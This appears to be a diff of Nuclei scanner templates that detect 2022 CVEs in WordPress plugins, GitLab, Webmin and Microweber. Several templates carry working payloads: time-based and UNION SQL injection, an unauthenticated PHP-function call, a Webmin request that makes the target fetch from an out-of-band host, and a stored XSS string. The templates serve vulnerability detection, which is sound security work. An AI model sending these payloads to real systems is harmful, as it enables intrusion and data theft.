The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
|
||||
WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
|
||||
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
|
||||
|
@ -40,3 +40,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 400
|
||||
|
||||
# Enhanced by mp on 2022/10/12
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0535
|
||||
|
||||
info:
|
||||
name: E2Pdf < 1.16.45 - Cross-Site Scripting
|
||||
name: WordPress E2Pdf <1.16.45 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The E2Pdf WordPress plugin before 1.16.45 does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
|
||||
WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a4162e96-a3c5-4f38-a60b-aa3ed9508985
|
||||
- https://wordpress.org/plugins/e2pdf/
|
||||
|
@ -62,3 +62,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- 'name="_nonce" value="([0-9a-zA-Z]+)"'
|
||||
|
||||
# Enhanced by md on 2022/10/18
|
||||
|
|
|
@ -1,15 +1,14 @@
|
|||
id: CVE-2022-0679
|
||||
|
||||
info:
|
||||
name: Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE
|
||||
name: WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion
|
||||
author: Veshraj
|
||||
severity: critical
|
||||
description: |
|
||||
The plugin fails to validate and sanitize the lib_path parameter before it is passed into a call to require() via the narnoo_distributor_lib_request AJAX action (available to both unauthenticated and authenticated users) which results in the disclosure of arbitrary files as the content of the file is then displayed in the response as JSON data. This could also lead to RCE with various tricks but depends on the underlying system and it's configuration.
|
||||
WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0679
|
||||
- https://www.cvedetails.com/cve/CVE-2022-0679/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -39,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/10/12
|
||||
|
|
|
@ -0,0 +1,100 @@
|
|||
id: CVE-2022-0735
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Runner Registration Token Disclosure
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0735
|
||||
cwe-id: CWE-863
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
||||
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
||||
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
||||
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
||||
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
||||
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
|
||||
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
||||
- "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
|
||||
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
|
||||
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
|
||||
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
||||
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
|
||||
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
||||
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
||||
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
||||
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
||||
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
||||
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
|
||||
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
|
||||
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
|
||||
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
||||
- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
|
||||
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
|
||||
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
|
||||
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
||||
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
||||
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
|
||||
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
||||
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
||||
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
||||
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
|
||||
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
|
||||
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
||||
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
||||
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
|
||||
- "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
|
||||
- "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
|
||||
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
|
||||
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
||||
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
||||
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
||||
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
||||
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
|
||||
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
||||
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
||||
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
||||
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
||||
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
|
||||
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
||||
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
||||
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
||||
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
||||
- "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
|
||||
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
|
||||
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
||||
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0781
|
||||
|
||||
info:
|
||||
name: Nirweb support < 2.8.2 - Unauthenticated SQLi
|
||||
name: WordPress Nirweb Support <2.8.2 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
|
||||
WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161
|
||||
- https://wordpress.org/plugins/nirweb-support/
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/12
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2022-0785
|
||||
|
||||
info:
|
||||
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
|
||||
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0785
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0785
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
|
||||
condition: and
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-0788
|
||||
|
||||
info:
|
||||
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
|
||||
- https://wordpress.org/plugins/wp-fundraising-donation/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0788
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0788
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "Invalid payment.")'
|
||||
condition: and
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0817
|
||||
|
||||
info:
|
||||
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
|
||||
- https://wordpress.org/plugins/badgeos/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0817
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- "contains(body, md5(num))"
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "badgeos-arrange-buttons")'
|
||||
condition: and
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2022-0824
|
||||
|
||||
info:
|
||||
name: Webmin prior to 1.990 - Improper Access Control to Remote Code Execution
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
|
||||
reference:
|
||||
- https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0824
|
||||
- https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
|
||||
- https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-0824
|
||||
cwe-id: CWE-284
|
||||
tags: rce,oss,huntr,cve,cve2022,webmin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /session_login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: redirect=1;testing=1;PHPSESSID=;
|
||||
|
||||
user={{username}}&pass={{password}}
|
||||
|
||||
- |
|
||||
POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: {{RootURL}}/filemin/?xnavigation=1
|
||||
|
||||
link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Failed to write to /{{ranstr}}/index.html"
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2022-0867
|
||||
|
||||
info:
|
||||
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0867
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "text/html")'
|
||||
- 'contains(body_2, "ArpPriceTable")'
|
||||
condition: and
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-0885
|
||||
|
||||
info:
|
||||
name: Member Hero <= 1.0.9 - Unauthenticated Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
|
||||
- https://wordpress.org/plugins/member-hero/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0885
|
||||
cwe-id: CWE-94
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "<!DOCTYPE html"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
|
@ -16,8 +16,8 @@ info:
|
|||
cve-id: CVE-2022-0928
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
|
||||
verified: true
|
||||
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -36,7 +36,7 @@ requests:
|
|||
|
||||
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
|
||||
|
||||
- |-
|
||||
- |
|
||||
POST /module HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
@ -49,9 +49,9 @@ requests:
|
|||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
|
||||
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
|
||||
- 'contains(all_headers_3,"text/html")'
|
||||
- 'status_code==200'
|
||||
- 'status_code_2 == 200 && status_code_3 == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/09/14
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue